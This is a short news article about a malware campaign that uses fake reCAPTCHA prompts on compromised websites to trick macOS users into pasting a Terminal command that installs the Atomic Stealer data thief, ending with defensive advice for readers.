Fake ReCAPTCHA Attack Installs MacOS Malware On Thousands Of Devices

A new malware campaign is targeting macOS users through fake reCAPTCHA popups, tricking them into installing powerful data-stealing software.

A large-scale macOS malware operation is targeting thousands of websites to spread dangerous malware to Apple users, as described in a research by Bad Byte.

The MacReaper malware scheme tricks users through deceptive security alerts, and uses blockchain functionality to steal passwords, together with credit card details, and cryptocurrency wallets.

When a macOS user visits one of the infected sites—such as a Brazilian news portal—they’re shown a fake reCAPTCHA window that asks them to click “I’m not a robot.” Once they do, a hidden script secretly copies a malicious command to the user’s clipboard.

The site then instructs the user to paste and run the command in Terminal. Doing so downloads and installs Atomic Stealer (AMOS), a piece of malware designed to extract a wide range of personal data.

AMOS allows attackers to gain control of passwords stored in macOS Keychain together with browser data from Chrome and Firefox as well as cryptocurrency wallets and system information and personal files. The attackers use Binance Smart Contracts, as part of blockchain technology, to hide their commands, making security tools ineffective at detecting or blocking the malware.

The scale of the attack is alarming. Bad Byte found more than 2800 compromised websites that belonged to different sectors including blogs, business sites, and news platforms. The researchers say that the majority of website owners remain unaware that their platforms serve as malware distribution channels.

To protect yourself, the researchers suggest avoiding executing Terminal commands from untrusted sources, particularly if prompted by a suspicious CAPTCHA.

This campaign highlights the growing sophistication of cyber threats against macOS users and serves as a stark reminder that Apple’s ecosystem is not immune to targeted attacks.